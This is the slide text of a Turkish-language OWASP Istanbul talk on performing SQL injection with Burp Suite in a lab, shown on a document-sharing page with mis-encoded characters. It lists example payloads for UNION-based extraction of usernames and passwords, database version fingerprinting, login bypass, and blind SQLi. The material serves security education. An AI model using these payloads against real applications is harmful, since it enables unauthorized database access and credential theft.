際際滷

際際滷Share a Scribd company logo

Burp Suite SQL Injection Attack | OWASP Istanbul

Download as PPTX, PDF
R
Rumeysa Bozdemir

05 Kas脹m 2022 tarihinde #owaspistanbul etkinliinde ger巽ekletirdiim sunumu g旦rmektesiz. Burp Suite web proxy uygulamas脹 kullan脹larak nas脹l SQL Injection Attack ger巽ekletirilebilir anlat脹lm脹 ve Lab ortam脹nda uygulmas脹 ger巽ekletirilmitir. Etkinlik sunumuna youtube kanal脹mdan eriebilirsiniz. (Biliimci K脹z) Sunumun detayl脹 makale hali https://bilisimcikiz.com adresinde yer almaktad脹r.

1 of 29
Download to read offline
@owaspistanbul - rumeysabozdemir@gmail.com
RUMEYSA BOZDEM聴R Computer Programming - Associate Degree Management Information System - Bachelors Degree ITIL 4 Foundation Certificate in IT Service Management ISO27001 LA - CQI|IRCA C|EH - EC - Council IT Expertise BEM Cyber Security Specialist TUBITAK OWASP Chapter Leaders - Istanbul @owaspistanbul - rumeysabozdemir@gmail.com
OWASP Kar amac脹 g端tmeyen ve yaz脹l脹m g端venliini art脹rmak i巽in 巽al脹an bir kurulutur. Yakla脹k 20 y脹ld脹r hizmet vermektedir. A巽脹k kaynak yaz脹l脹m projeleri Y端zlerce yerel b旦l端m On binlerce 端ye Eitim / Konferans @owaspistanbul - rumeysabozdemir@gmail.com
OWASP @owaspistanbul @rumeysabzdmr @owaspistanbul - rumeysabozdemir@gmail.com @owaspistanbul
OWASP INFO @owaspistanbul - rumeysabozdemir@gmail.com Burp Suite Nedir? Burp Suite Nas脹l Kullan脹l脹r? SQL Injection Zafiyeti Nedir? SQL Injection Zafiyetinin Etkileri Nedir? Sql Inject脹on rnekleri WHERE ile Gizli Verileri ekme Login Bypass Etme UNION Attack ile S端tun Say脹s脹 D旦nd端rme UNION Attack ile Metin 聴巽eren S端tun Bulma UNION Attack ile Tablodan Veri ekme UNION Attack ile Bir S端tuna Birden Fazla Veri ekme Oracle Veritaban脹ndan Versiyon renme MySQL ve Microsoft Veritaban脹 ve Versiyon Bilgisini ekme Oracle D脹脹ndaki Veritabanlar脹nda SQLi Sald脹r脹lar脹 Oracle Veritabanlar脹nda SQLi Sald脹r脹lar脹 Koullu Yan脹tlar 聴le Blind SQLi Zafiyeti Koullu Sorgularda Hatalar脹 Yorumlayarak Blind SQLi S旦m端rme
OWASP | BURP SUITE NED聴R? @owaspistanbul - rumeysabozdemir@gmail.com JAVA dilinde yaz脹lm脹t脹r. Web Proxy uygulamas脹d脹r. Web uygulama testlerinde kullan脹l脹r.
OWASP | BURP SUITE NASIL KULLANILIR? @owaspistanbul - rumeysabozdemir@gmail.com https://portswigger.net/
OWASP | BURP SUITE NASIL KULLANILIR? @owaspistanbul - rumeysabozdemir@gmail.com Uygulama i巽in ihtiyac脹m脹z olanlar; Burp Suite Community Edition https://portswigger.net/burp/communitydownload Kali Linux ya da Windows OS https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
OWASP | SQL INJECTION ZAF聴YET聴 NED聴R? @owaspistanbul - rumeysabozdemir@gmail.com SQL injection (SQLi), bir uygulaman脹n veritaban脹 ile iletiimi esnas脹nda birtak脹m teknikleri kullanarak sorgulara m端dahale etme ilemidir. Son kullan脹c脹n脹n g旦rmemesi gereken, bilmemesi gereken ya da erimemesi gereken bilgilere erime durumudur.
OWASP | SQL INJECTION ZAF聴YET聴N聴N ETK聴LER聴 NED聴R? @owaspistanbul - rumeysabozdemir@gmail.com 聴llegal ekilde yay脹lma, Dark Web sat脹, Parola, Kredi kart脹 bilgileri, Kiisel veriler, Backdoor
OWASP | SQL INJECTION RNEKLER聴 @owaspistanbul - rumeysabozdemir@gmail.com Gizli Verileri ekme Uygulama Mant脹脹n脹 Alt st Etme UNION Sald脹r脹lar脹 Kullan脹lan Veritaban脹n脹 聴nceleme Blind SQL Injection
OWASP | WHERE 聴LE G聴ZL聴 VER聴LER聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com SQL sorgusu yaparken; SELECT, DELETE, UPDATE ve INSERT gibi deerler kullan脹l脹r. WHERE deeri ile de tablodaki hangi s端tundan veri 巽ekilecek ise o belirtilir ve sorgular istenilen veriye/bilgiye g旦re ekillendirilir. RNEK KULLANIM SELECT * FROM products WHERE category = ''' AND released = 1
OWASP | LOGIN BYPASS ETME @owaspistanbul - rumeysabozdemir@gmail.com Oturum deikenlerine m端dahale, Texboxlara direkt komut yazma, RNEK KULLANIM Or, AND =, -- , (, / vb.
OWASP | UNION ATTACK 聴LE STUN SAYISI DNDRME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT NULL, NULL ORDER BY 1--
OWASP | UNION ATTACK 聴LE MET聴N 聴EREN STUN BULMA @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT NULL, bilisimcikiz, NULL--
OWASP | UNION ATTACK 聴LE TABLODAN VER聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT username, password FROM users--
OWASP | UNION ATTACK 聴LE B聴R STUNA B聴RDEN FAZLA VER聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT NULL, username||'*'||password FROM users--
OWASP | ORACLE VER聴TABANINDAN VERS聴YON RENME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT banner, 'bilisimcikiz FROM v$version--
OWASP | MYSQL VE MICROSOFT VER聴TABANI VE VERS聴YON B聴LG聴S聴N聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT @@version NULL#
OWASP | ORACLE DIINDAK聴 VER聴TABANLARINDA SQLi SALDIRILARI @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT username_tqsccf, password_iolsok from users_jowqzh--
OWASP | ORACLE VER聴TABANLARINDA SQLi SALDIRILARI @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT PASSWORD_LBIELG, USERNAME_AMLAPI FROM USERS_MGQWPY--
OWASP | KOULLU YANITLAR 聴LE BLIND SQLi ZAF聴YET聴 @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM and (select username from users where username='administrator' and LENGTH(password)>19)='administrator'--
OWASP | KOULLU SORGULARDA HATALARI YORUMLAYARAK BLIND SQLi SMRME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users--
OWASP @owaspistanbul @rumeysabzdmr @owaspistanbul - rumeysabozdemir@gmail.com @owaspistanbul
OWASP @owaspistanbul - rumeysabozdemir@gmail.com
KAYNAKLAR @owaspistanbul - rumeysabozdemir@gmail.com https://portswigger.net/burp/communitydownload https://portswigger.net/web-security/file-upload

More Related Content

Burp Suite SQL Injection Attack | OWASP Istanbul

  • 2. RUMEYSA BOZDEM聴R Computer Programming - Associate Degree Management Information System - Bachelors Degree ITIL 4 Foundation Certificate in IT Service Management ISO27001 LA - CQI|IRCA C|EH - EC - Council IT Expertise BEM Cyber Security Specialist TUBITAK OWASP Chapter Leaders - Istanbul @owaspistanbul - rumeysabozdemir@gmail.com
  • 3. OWASP Kar amac脹 g端tmeyen ve yaz脹l脹m g端venliini art脹rmak i巽in 巽al脹an bir kurulutur. Yakla脹k 20 y脹ld脹r hizmet vermektedir. A巽脹k kaynak yaz脹l脹m projeleri Y端zlerce yerel b旦l端m On binlerce 端ye Eitim / Konferans @owaspistanbul - rumeysabozdemir@gmail.com
  • 5. OWASP INFO @owaspistanbul - rumeysabozdemir@gmail.com Burp Suite Nedir? Burp Suite Nas脹l Kullan脹l脹r? SQL Injection Zafiyeti Nedir? SQL Injection Zafiyetinin Etkileri Nedir? Sql Inject脹on rnekleri WHERE ile Gizli Verileri ekme Login Bypass Etme UNION Attack ile S端tun Say脹s脹 D旦nd端rme UNION Attack ile Metin 聴巽eren S端tun Bulma UNION Attack ile Tablodan Veri ekme UNION Attack ile Bir S端tuna Birden Fazla Veri ekme Oracle Veritaban脹ndan Versiyon renme MySQL ve Microsoft Veritaban脹 ve Versiyon Bilgisini ekme Oracle D脹脹ndaki Veritabanlar脹nda SQLi Sald脹r脹lar脹 Oracle Veritabanlar脹nda SQLi Sald脹r脹lar脹 Koullu Yan脹tlar 聴le Blind SQLi Zafiyeti Koullu Sorgularda Hatalar脹 Yorumlayarak Blind SQLi S旦m端rme
  • 6. OWASP | BURP SUITE NED聴R? @owaspistanbul - rumeysabozdemir@gmail.com JAVA dilinde yaz脹lm脹t脹r. Web Proxy uygulamas脹d脹r. Web uygulama testlerinde kullan脹l脹r.
  • 7. OWASP | BURP SUITE NASIL KULLANILIR? @owaspistanbul - rumeysabozdemir@gmail.com https://portswigger.net/
  • 8. OWASP | BURP SUITE NASIL KULLANILIR? @owaspistanbul - rumeysabozdemir@gmail.com Uygulama i巽in ihtiyac脹m脹z olanlar; Burp Suite Community Edition https://portswigger.net/burp/communitydownload Kali Linux ya da Windows OS https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
  • 9. OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
  • 10. OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
  • 11. OWASP | PROXY AYARI @owaspistanbul - rumeysabozdemir@gmail.com
  • 12. OWASP | SQL INJECTION ZAF聴YET聴 NED聴R? @owaspistanbul - rumeysabozdemir@gmail.com SQL injection (SQLi), bir uygulaman脹n veritaban脹 ile iletiimi esnas脹nda birtak脹m teknikleri kullanarak sorgulara m端dahale etme ilemidir. Son kullan脹c脹n脹n g旦rmemesi gereken, bilmemesi gereken ya da erimemesi gereken bilgilere erime durumudur.
  • 13. OWASP | SQL INJECTION ZAF聴YET聴N聴N ETK聴LER聴 NED聴R? @owaspistanbul - rumeysabozdemir@gmail.com 聴llegal ekilde yay脹lma, Dark Web sat脹, Parola, Kredi kart脹 bilgileri, Kiisel veriler, Backdoor
  • 14. OWASP | SQL INJECTION RNEKLER聴 @owaspistanbul - rumeysabozdemir@gmail.com Gizli Verileri ekme Uygulama Mant脹脹n脹 Alt st Etme UNION Sald脹r脹lar脹 Kullan脹lan Veritaban脹n脹 聴nceleme Blind SQL Injection
  • 15. OWASP | WHERE 聴LE G聴ZL聴 VER聴LER聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com SQL sorgusu yaparken; SELECT, DELETE, UPDATE ve INSERT gibi deerler kullan脹l脹r. WHERE deeri ile de tablodaki hangi s端tundan veri 巽ekilecek ise o belirtilir ve sorgular istenilen veriye/bilgiye g旦re ekillendirilir. RNEK KULLANIM SELECT * FROM products WHERE category = ''' AND released = 1
  • 16. OWASP | LOGIN BYPASS ETME @owaspistanbul - rumeysabozdemir@gmail.com Oturum deikenlerine m端dahale, Texboxlara direkt komut yazma, RNEK KULLANIM Or, AND =, -- , (, / vb.
  • 17. OWASP | UNION ATTACK 聴LE STUN SAYISI DNDRME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT NULL, NULL ORDER BY 1--
  • 18. OWASP | UNION ATTACK 聴LE MET聴N 聴EREN STUN BULMA @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT NULL, bilisimcikiz, NULL--
  • 19. OWASP | UNION ATTACK 聴LE TABLODAN VER聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT username, password FROM users--
  • 20. OWASP | UNION ATTACK 聴LE B聴R STUNA B聴RDEN FAZLA VER聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT NULL, username||'*'||password FROM users--
  • 21. OWASP | ORACLE VER聴TABANINDAN VERS聴YON RENME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT banner, 'bilisimcikiz FROM v$version--
  • 22. OWASP | MYSQL VE MICROSOFT VER聴TABANI VE VERS聴YON B聴LG聴S聴N聴 EKME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT @@version NULL#
  • 23. OWASP | ORACLE DIINDAK聴 VER聴TABANLARINDA SQLi SALDIRILARI @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT username_tqsccf, password_iolsok from users_jowqzh--
  • 24. OWASP | ORACLE VER聴TABANLARINDA SQLi SALDIRILARI @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT PASSWORD_LBIELG, USERNAME_AMLAPI FROM USERS_MGQWPY--
  • 25. OWASP | KOULLU YANITLAR 聴LE BLIND SQLi ZAF聴YET聴 @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM and (select username from users where username='administrator' and LENGTH(password)>19)='administrator'--
  • 26. OWASP | KOULLU SORGULARDA HATALARI YORUMLAYARAK BLIND SQLi SMRME @owaspistanbul - rumeysabozdemir@gmail.com RNEK KULLANIM UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users--
  • 29. KAYNAKLAR @owaspistanbul - rumeysabozdemir@gmail.com https://portswigger.net/burp/communitydownload https://portswigger.net/web-security/file-upload